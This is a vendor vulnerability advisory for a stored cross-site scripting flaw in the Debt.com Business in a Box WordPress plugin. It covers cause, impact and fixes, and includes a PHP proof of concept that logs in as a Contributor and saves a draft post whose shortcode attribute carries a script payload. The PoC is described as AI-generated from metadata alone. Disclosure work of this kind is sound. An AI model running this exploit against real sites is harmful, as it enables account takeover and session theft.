Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-13852: Debt.com Business in a Box <= 4.1.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (debtcom-business-in-a-box)

CVE ID CVE-2025-13852
Plugin debtcom-business-in-a-box
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 4.1.0
Patched Version
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13852 (metadata-based):

This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Debt.com Business in a Box WordPress plugin. The vulnerability exists in the plugin’s ‘lead_form’ shortcode handler, specifically within its ‘configuration’ parameter processing. Attackers with Contributor-level permissions or higher can inject malicious scripts into pages or posts. These scripts execute when other users view the compromised content. The CVSS 3.1 score of 6.4 (Medium severity) reflects the network attack vector, low attack complexity, and the requirement for authenticated access with low privileges.

Atomic Edge research infers the root cause is improper neutralization of user-supplied input before web page generation (CWE-79). The vulnerability description explicitly cites insufficient input sanitization and output escaping on the ‘configuration’ parameter. Without access to the source code, we cannot confirm the exact vulnerable function. The likely vulnerable code pattern involves a shortcode callback function that receives the ‘configuration’ attribute, fails to sanitize it with `sanitize_text_field` or similar, and later outputs the value without proper escaping via `esc_attr` or `wp_kses`.

Exploitation requires an authenticated attacker with at least Contributor-level access. The attacker creates or edits a post or page and inserts the plugin’s shortcode with a malicious ‘configuration’ attribute. The shortcode syntax would resemble `[lead_form configuration=”malicious_payload”]`. Alternatively, an attacker could directly update post content in the database via a separate SQL injection or by manipulating draft posts. The payload executes in the victim’s browser context when they view the page containing the shortcode.

Effective remediation requires implementing proper input validation and output escaping. The plugin should sanitize the ‘configuration’ shortcode attribute value upon receipt using WordPress core functions like `sanitize_text_field`. Before outputting the value in any front-end or admin context, the plugin must escape it appropriately. For HTML attribute contexts, `esc_attr` is suitable. For content within HTML elements, `wp_kses_post` or `esc_html` should be used. A patch would involve modifying the shortcode handler function to apply these sanitization and escaping measures.

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the compromised page. This can lead to session hijacking, account takeover, defacement, or redirection to malicious sites. Attackers can perform actions as the victim user, including creating administrative accounts if a site administrator views the page. The stored nature of the attack increases its impact, as the payload persists and affects all subsequent visitors until removed.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13852 - Debt.com Business in a Box <= 4.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
<?php
/**
 * Proof of Concept for CVE-2025-13852.
 * This script demonstrates exploitation by an authenticated Contributor+ user.
 * Assumptions:
 * 1. The target site has the vulnerable plugin (<=4.1.0) active.
 * 2. Valid Contributor-level credentials are available.
 * 3. The attacker can create or edit posts/pages.
 * 4. The 'lead_form' shortcode is registered and functional.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_password'; // CONFIGURE THIS

// Payload: Basic XSS to demonstrate script execution.
// In a real attack, this would be more sophisticated (e.g., cookie theft).
$xss_payload = '<script>alert(`Atomic Edge XSS Test: ${document.domain}`)</script>';

// Step 1: Authenticate and obtain WordPress nonce and cookies.
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, true);
$login_response = curl_exec($ch);

// Step 2: Create a new post with the malicious shortcode.
// Contributor users can create posts (but not publish). We'll create a draft.
$create_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$post_page = curl_exec($ch);

// Extract the nonce for creating/updating posts (typically '_wpnonce' or 'meta-box-order-nonce').
// This is a simplified extraction; real implementation may need regex based on page structure.
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $post_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

if (empty($nonce)) {
    die('Failed to extract nonce. Authentication may have failed.');
}

// Step 3: Submit the post with the malicious shortcode.
$save_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    'post_title' => 'Atomic Edge Test Post',
    'content' => '[lead_form configuration="' . $xss_payload . '"]',
    'post_status' => 'draft',
    'post_type' => 'post',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $create_post_url,
    'action' => 'editpost',
    'post_ID' => '0' // New post
);

curl_setopt($ch, CURLOPT_URL, $save_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_HEADER, false);
$save_response = curl_exec($ch);

// Step 4: Verify the post was created (optional).
if (strpos($save_response, 'Post draft updated.') !== false || strpos($save_response, 'Post published.') !== false) {
    echo "Exploit likely successful. The post contains the malicious shortcode.n";
    echo "Visit the draft post URL to trigger the XSS payload.n";
} else {
    echo "Post creation may have failed. Check permissions and nonce.n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School